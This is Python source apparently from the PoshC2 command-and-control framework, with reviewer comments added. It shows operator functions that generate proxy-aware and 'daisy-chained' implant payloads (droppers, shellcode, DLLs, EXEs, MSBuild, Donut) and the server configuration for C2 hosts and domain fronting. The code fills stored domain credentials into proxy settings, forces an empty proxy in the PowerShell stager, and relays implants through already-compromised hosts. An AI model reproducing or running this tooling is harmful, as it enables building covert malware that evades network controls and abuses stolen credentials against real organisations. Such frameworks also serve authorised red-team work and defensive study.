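def do_createnewpayload(user, command, creds=None, shellcodeOnly=False):
    """Interactively create a new proxy-aware payload set.

    Strips the ``createnewpayload`` keyword from *command*, optionally resolves a
    ``-credid`` argument into proxy credentials, prompts the operator for the C2
    hosts, domain-front headers, proxy and PBind settings, records the URL set via
    ``new_urldetails`` and then writes the payload files into ``PayloadsDirectory``
    with a ``<name>_`` prefix.

    Args:
        user: operator name, passed through to ``get_creds_from_params``.
        command: the raw console command line.
        creds: optional pre-resolved credential record (a mapping with
            ``Domain`` / ``Username`` / ``Password`` keys).  A ``-credid`` in
            *command* takes precedence over it.
        shellcodeOnly: when true only droppers and shellcode are built,
            otherwise ``CreateAll`` is used.

    Returns:
        None.  The function aborts early (after a "Press Enter" pause) when the
        credential cannot be resolved, when it carries no plaintext password, or
        when the number of comms hosts and domain-front headers differ.
    """
    import getpass  # function-scope: the file's import block is not in view here

    params = re.compile("createnewpayload ", re.IGNORECASE).sub("", command)

    # The original reset ``creds`` to None unconditionally, silently discarding
    # anything the caller passed in.  Keep the caller's value; -credid still wins.
    if "-credid" in params:
        creds, params = get_creds_from_params(params, user)
        if creds is None:
            return
    # Proxy authentication needs a plaintext password regardless of where the
    # credential record came from.
    if creds is not None and not creds['Password']:
        print_bad("This command does not support credentials with hashes")
        input("Press Enter to continue...")
        clear()
        return

    # NOTE(review): ``name`` is used verbatim as a file-name prefix under
    # PayloadsDirectory; it is operator input and is not sanitised here.
    name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
    comms_url = input("Domain or URL in array format: https://www.example.com,https://www.example2.com ")
    domainfront = input("Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net ")
    proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
    pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ")
    pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ")

    comms_url, PayloadCommsHostCount = string_to_array(comms_url)
    domainfront, DomainFrontHeaderCount = string_to_array(domainfront)
    if PayloadCommsHostCount != DomainFrontHeaderCount:
        print("[-] Error - different number of host headers and URLs")
        input("Press Enter to continue...")
        clear()
        # The original fell through here and built a payload whose host and
        # domain-front arrays did not line up; abort instead.
        return

    proxyuser = ""
    proxypass = ""
    credsexpire = ""
    if proxyurl:
        if creds is not None:
            # Same DOMAIN\user shape the interactive prompt below documents.
            proxyuser = f"{creds['Domain']}\\{creds['Username']}"
            proxypass = creds['Password']
        else:
            proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
            # getpass so the proxy password is not echoed into the terminal
            # scrollback / session log.
            proxypass = getpass.getpass("Proxy Password: e.g. Password1 ")
        credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ")
        # "?p" marks a proxy-enabled implant URL; plain URL otherwise.
        imurl = "%s?p" % get_newimplanturl()
    else:
        imurl = get_newimplanturl()
    C2 = get_c2server_all()

    urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
    newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret)

    prefix = "%s_" % name
    if shellcodeOnly:
        newPayload.CreateDroppers(prefix)
        newPayload.CreateShellcode(prefix)
    else:
        newPayload.CreateAll(prefix)

    print_good("Created new payloads")
    input("Press Enter to continue...")
    clear()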
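def do_createdaisypayload(user, command):
    """Interactively create a "daisy" payload set that chains through an existing implant.

    Prompts for a payload name, the daisy URL and the ID of the implant that will
    relay traffic, records a URL entry for the configured C2 hosts, builds a
    ``Payloads`` object with the proxy disabled in the PowerShell stager, patches
    the dropper so it carries ``user@domain`` of the relay host, and writes every
    payload flavour into ``PayloadsDirectory`` prefixed with ``<name>_``.

    Args:
        user: operator name (unused in this function, kept for the console
            command signature).
        command: the raw console command line (unused here).

    Returns:
        None.  Aborts (after a "Press Enter" pause) when no implant matches the
        selected ID.
    """
    name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    daisyurl = input(f"Daisy URL: e.g. {default_url} ")
    # Loopback is rewritten to "localhost" for both schemes — presumably so the
    # implant-side request matches how the relay listens; confirm against the
    # implant code.
    for scheme in ("http", "https"):
        daisyurl = daisyurl.replace(f"{scheme}://127.0.0.1", f"{scheme}://localhost")

    daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
    daisyhost = get_implantbyid(daisyhostid)
    # get_implantbyid's miss behaviour is not visible here; guard against a
    # missing record so the .User/.Domain access below cannot raise.
    if daisyhost is None:
        print_bad(f"No implant found with ID {daisyhostid}")
        input("Press Enter to continue...")
        clear()
        return

    # Force an empty proxy in the PowerShell stager: daisy traffic goes to the
    # relay implant, never through the system proxy.
    proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
    pbindsecret = PBindSecret
    pbindpipename = PBindPipeName

    # string_to_array returns the normalised string form; the count is unused.
    daisyurl, _daisyurl_count = string_to_array(daisyurl)
    # (The original also built a comma-separated list of empty host headers here
    # that was never used; it has been dropped.)

    C2 = get_c2server_all()
    urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "",
                           "", "", "")
    newPayload = Payloads(C2.KillDate,
                          C2.EncKey,
                          C2.Insecure,
                          C2.UserAgent,
                          C2.Referrer,
                          "%s?d" % get_newimplanturl(),  # "?d" marks a daisy implant URL
                          PayloadsDirectory,
                          PowerShellProxyCommand=proxynone,
                          URLID=urlId,
                          PBindPipeName=pbindpipename,
                          PBindSecret=pbindsecret)
    # The PS dropper embeds "$pid;<url>"; swap the URL for the relay host's
    # identity so the server can attribute the chained implant.
    newPayload.PSDropper = (newPayload.PSDropper).replace(
        "$pid;%s" % (daisyurl),
        "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))

    prefix = "%s_" % name
    builders = (
        newPayload.CreateDroppers,
        newPayload.CreateShellcode,
        newPayload.CreateRaw,
        newPayload.CreateDlls,
        newPayload.CreateEXE,
        newPayload.CreateMsbuild,
        newPayload.CreateDonutShellcode,
        newPayload.BuildDynamicPayloads,
    )
    for build in builders:  # same order as before
        build(prefix)
    print_good("Created new %s daisy payloads" % name)
    input("Press Enter to continue...")
    clear()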
# Derived resource paths; ResourcesDirectory / PoshInstallDirectory are defined
# earlier in this module (not shown here).  Note the asymmetry: ResourcesDirectory
# is assumed to end with "/", PoshInstallDirectory is not.
ImagesDirectory: str = f"{ResourcesDirectory}images/"
PayloadModulesDirectory: str = f"{PoshInstallDirectory}/poshc2/server/payloads/"

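# Database Config
# Selects the backend from config["DatabaseType"] (case-insensitive) and sets
# Database to either the SQLite file path or the Postgres connection string.
if config["DatabaseType"].lower() == "sqlite":
    DatabaseType = DBType.SQLite
    Database = f"{PoshProjectDirectory}PowershellC2.SQLite"
elif config["DatabaseType"].lower() == 'postgres':
    DatabaseType = DBType.Postgres
    Database = config["PostgresConnectionString"]
else:
    # Report the configured value: the original formatted ``DatabaseType`` here,
    # which is not assigned on this path, so the f-string raised a NameError
    # instead of the intended configuration error.
    raise Exception(
        f"Invalid configuration: DatabaseType must be Postgres or SQLite: {config['DatabaseType']}"
    )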

# Normalise the comma-separated host and domain-front lists; string_to_array
# returns (normalised string, element count).  Every comms host must have a
# matching domain-front header, so a count mismatch is fatal at startup.
PayloadCommsHostString, PayloadCommsHostCount = string_to_array(
    config["PayloadCommsHost"])
DomainFrontHeaderString, DomainFrontHeaderCount = string_to_array(
    config["DomainFrontHeader"])
if PayloadCommsHostCount != DomainFrontHeaderCount:
    raise Exception(
        "[-] Error - different number of host headers and URLs in config.yml")
# Server Config
# Listener bind address/port, read straight from config with no validation here.
BindIP = config["BindIP"]
BindPort = config["BindPort"]

# Payload Comms
# Module-level aliases of the normalised host/header strings computed above,
# plus the HTTP identity the server and payloads present.
PayloadCommsHost = PayloadCommsHostString
DomainFrontHeader = DomainFrontHeaderString
Referrer = config["Referrer"]
ServerHeader = config["ServerHeader"]
UserAgent = config["UserAgent"]